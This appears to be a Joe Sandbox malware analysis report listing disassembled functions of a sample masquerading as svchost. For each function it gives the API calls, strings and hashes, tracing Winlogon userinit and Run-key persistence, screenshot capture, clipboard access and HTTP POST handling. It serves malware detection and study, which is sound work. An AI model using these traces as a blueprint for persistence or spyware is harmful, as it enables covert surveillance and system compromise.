                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02663A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02663A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: \$path.txt$stf.zip
                                                                                                                                                                                                              • API String ID: 3351314726-487659054
                                                                                                                                                                                                              • Opcode ID: 763a70d4b8a8d08b9f2908d78e9bc9ebcc2910bb883581216d2c453cb8243c41
                                                                                                                                                                                                              • Instruction ID: 77f26a9e7487b7fd229692803226d75ec4a1d3aeb40314e2244ad6c574046b18
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 763a70d4b8a8d08b9f2908d78e9bc9ebcc2910bb883581216d2c453cb8243c41
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB61F1309006496FDB25DB249CACBFE7BA8AF45700F5446D8E9CAD7340EF719998CB90
                                                                                                                                                                                                              Function 0265317E Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 297memorythreadclipboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0265325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0265327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 02653286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 0265329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 026532AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 026532D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 026532FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02653301
                                                                                                                                                                                                              • memset.MSVCRT ref: 02653311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0265332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 02653399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 026533DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3472172748-4108050209
                                                                                                                                                                                                              • Opcode ID: c7f8fbd7e7c01e9aa153dacbf6b7f9a7c472557bb786db4477cbf217981149c8
                                                                                                                                                                                                              • Instruction ID: 07965821ccb2fdce2f94b44edbc29c807a6e1beb4b7bc314faaab39cdadab6ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7f8fbd7e7c01e9aa153dacbf6b7f9a7c472557bb786db4477cbf217981149c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D641F332604361ABD7209F64DC8CF6B7BA8EF85B94F050B58FD85D7380DF60D62486A6
                                                                                                                                                                                                              Function 00401150 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 133memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401285
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID: G,@
                                                                                                                                                                                                              • API String ID: 132362422-3313068137
                                                                                                                                                                                                              • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                              Function 0265F2D0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 109sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A7A5), ref: 0265F2F7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265F33B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265F347
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265F34B
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265F35C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265F363
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 0265F390
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265F39F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265F3A5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265F3A9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265F3BA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265F3C1
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0265F3EF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 0265F405
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$8A99A7A5$scrs
                                                                                                                                                                                                              • API String ID: 1455050916-1123714631
                                                                                                                                                                                                              • Opcode ID: 0d0aa2205919d11ce6b601c1cfc741e47a48d20d72931ae23595dca0da84ac36
                                                                                                                                                                                                              • Instruction ID: 018765827606bb54fcdd99952a0da9c3ae88fcdb1859aaa64721982ff45aa40a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d0aa2205919d11ce6b601c1cfc741e47a48d20d72931ae23595dca0da84ac36
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91312D319443286BDB10DB749C58BEE7BE8BF56700F855999E986D3200EFB0D9C4CBA0
                                                                                                                                                                                                              Function 02664A10 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 175registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,76F930D0,00000000), ref: 02664A43
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?,76DC0180), ref: 02664A6D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02664A8D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02664ABA
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02664ABE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02664B60
                                                                                                                                                                                                                • Part of subcall function 026541B0: GetProcessHeap.KERNEL32(00000000,00000000,6F9690B0,02650C69), ref: 026541BE
                                                                                                                                                                                                                • Part of subcall function 026541B0: HeapValidate.KERNEL32(00000000), ref: 026541C1
                                                                                                                                                                                                                • Part of subcall function 026541B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 026541CE
                                                                                                                                                                                                                • Part of subcall function 026541B0: RtlFreeHeap.NTDLL(00000000), ref: 026541D1
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02664B71
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02664B7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Value$ProcessQuery$CloseExistsFileFlushFreeOpenPathValidate
                                                                                                                                                                                                              • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 579956326-2103896814
                                                                                                                                                                                                              • Opcode ID: 866f36868d75d7e90afc43e8fa9c73e18ca5e97866db3168226620d3c3e6470b
                                                                                                                                                                                                              • Instruction ID: 2a7a1b09ebc63b7880da1006169c04cf3874d628a4ebfe95a3dbd5c70e3952e3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 866f36868d75d7e90afc43e8fa9c73e18ca5e97866db3168226620d3c3e6470b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A51E639640246BFEB309B64DC98FFEB7B9EF85704F104684E942AB304DB719A15C790
                                                                                                                                                                                                              Function 02661320 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A5C5), ref: 02661347
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02661389
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02661395
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02661399
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026613AA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 026613B1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 026613E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026613E8
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 026613EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026613FD
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02661404
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02661432
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02661448
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$8A99A5C5$scrs
                                                                                                                                                                                                              • API String ID: 224938940-2537590803
                                                                                                                                                                                                              • Opcode ID: c6802679afd7228bf4075138f50271c7fcd8dc8632e5ae604fe32e5e92acb8a0
                                                                                                                                                                                                              • Instruction ID: 904a081844e58db6dbde5df60282688d965e9b390138cf9889b5b32313eacce4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6802679afd7228bf4075138f50271c7fcd8dc8632e5ae604fe32e5e92acb8a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F31D8319442186BDB10DB759C58BFEBBE8AF56700F895594E98AE3300EF70D9D4CBA0
                                                                                                                                                                                                              Function 02662390 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a2c5), ref: 026623B7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 026623F9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02662405
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02662409
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266241A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02662421
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02662452
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02662458
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0266245C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266246D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02662474
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026624A2
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 026624B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$8a99a2c5$scrs
                                                                                                                                                                                                              • API String ID: 224938940-3371760077
                                                                                                                                                                                                              • Opcode ID: 2ce48ebb623c73de6d564646ea4360a33c7881706110b48060c9687f29d2f7a0
                                                                                                                                                                                                              • Instruction ID: 7c789dd3940629b3ac4c470d268ba394d9bdcae3d745b4497d22fe94cd013146
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ce48ebb623c73de6d564646ea4360a33c7881706110b48060c9687f29d2f7a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E31F6319442186BDB209B749C68BFEBBE8AF55700F855594E986D3240EFB0D9C4CBA0
                                                                                                                                                                                                              Function 02663080 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 026630A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 026630E9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026630F5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 026630F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266310A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02663111
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02663142
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02663148
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0266314C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266315D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02663164
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02663192
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 026631A8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$8A99A277$scrs
                                                                                                                                                                                                              • API String ID: 224938940-3362442297
                                                                                                                                                                                                              • Opcode ID: b31fd7deb38591af17299385bb64daad2412aa60132eacca927c7b9be366ea77
                                                                                                                                                                                                              • Instruction ID: 8e10ce6435765990f58d7c857ec00ade1b2c1e79c15c9ef9094f07bcaac1abbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b31fd7deb38591af17299385bb64daad2412aa60132eacca927c7b9be366ea77
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4531E4319442186BDB209B749C58BFEBBE8AF59700F855994E986D3300EFB0D9D4CBA0
                                                                                                                                                                                                              Function 02655090 Relevance: 27.1, APIs: 18, Instructions: 133memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,76F93050,76F930D0,76F93080), ref: 026550B7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026550BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 026550CE
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 026550F5
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02655113
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265511D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02655120
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265512D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02655130
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02655148
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0265514F
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265515F
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02655175
                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 026551A1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 026551D1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026551D4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 026551E4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026551E7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1718479325-0
                                                                                                                                                                                                              • Opcode ID: 0ff39c37d345f5a15e9136fc369d1eb39e3ab3f9061659a6bcd55fce8c2083d2
                                                                                                                                                                                                              • Instruction ID: c47265c8724a4ccf171bddf1976a2a51178489b296dbe1c4a45623311e358111
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ff39c37d345f5a15e9136fc369d1eb39e3ab3f9061659a6bcd55fce8c2083d2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6418E71940325BBDB309F65CC8CF9E7F68AF44750F968628ED069B380DB719581CBA1
                                                                                                                                                                                                              Function 02655200 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 210stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02655250
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265527C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,0000001C,0000001C), ref: 026552A3
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000005), ref: 026552D4
                                                                                                                                                                                                              • strstr.MSVCRT ref: 026552FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02655315
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(-00000010), ref: 02655323
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000004), ref: 02655355
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                              • String ID: $Content-Length: $POST
                                                                                                                                                                                                              • API String ID: 2509092961-2076583852
                                                                                                                                                                                                              • Opcode ID: eb56c533f1711055061ee0f36ff88db44fee8b1d58801bbb0060c173054b8f5e
                                                                                                                                                                                                              • Instruction ID: 03b4cede5b07b3d1cbcef878887de55ba879431a8d1006184cf12d57df0a1b1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb56c533f1711055061ee0f36ff88db44fee8b1d58801bbb0060c173054b8f5e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F715D71D40359EFDB10DFA8D884AAEBBF9BB48704F444629E90AE7240EB7199518F90
                                                                                                                                                                                                              Function 02648320 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 156synchronizationmemorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264833C
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,?,?,02648212,00000000,00000000), ref: 02648343
                                                                                                                                                                                                              • SetThreadDesktop.USER32(00000000,?,?,02648212,00000000,00000000), ref: 0264834F
                                                                                                                                                                                                                • Part of subcall function 0264DA20: GetTickCount.KERNEL32 ref: 0264DA2D
                                                                                                                                                                                                                • Part of subcall function 0264DA20: HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0264DA3E
                                                                                                                                                                                                                • Part of subcall function 0264DA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,0268F5A0), ref: 0264DA6A
                                                                                                                                                                                                                • Part of subcall function 0264DA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0264DA83
                                                                                                                                                                                                                • Part of subcall function 0264DA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,0268F54C), ref: 0264DAB0
                                                                                                                                                                                                                • Part of subcall function 0264DA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0264DAC3
